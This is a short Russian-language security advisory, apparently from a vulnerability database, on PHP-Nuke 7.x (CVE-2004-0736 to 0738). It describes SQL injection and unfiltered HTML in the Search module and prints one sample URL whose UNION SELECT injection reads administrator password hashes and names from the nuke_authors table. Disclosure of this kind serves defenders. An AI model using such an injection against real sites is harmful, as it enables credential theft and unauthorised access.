Дата публикации: | 18.07.2004 |
Всего просмотров: | 2023 |
Опасность: | Средняя |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: |
CVE-2004-0736 CVE-2004-0737 CVE-2004-0738 |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Межсайтовый скриптинг Раскрытие важных данных Неавторизованное изменение данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | PHP-Nuke 7.x |
Уязвимые версии: PHP-Nuke
Описание: Несколько уязвимостей в PHP-Nuke позволяют удаленному пользователю выполнить SQL команды и XSS нападение. 1. SQL инъекция: http://localhost/nuke73/modules.php?name=Search&type=comments& query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors2. /modules/Search/index.php' не фильтрует HTMl код в поле поиска. URL производителя:http://www.phpnuke.org/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | Multiple security holes in PhpNuke - part 2 |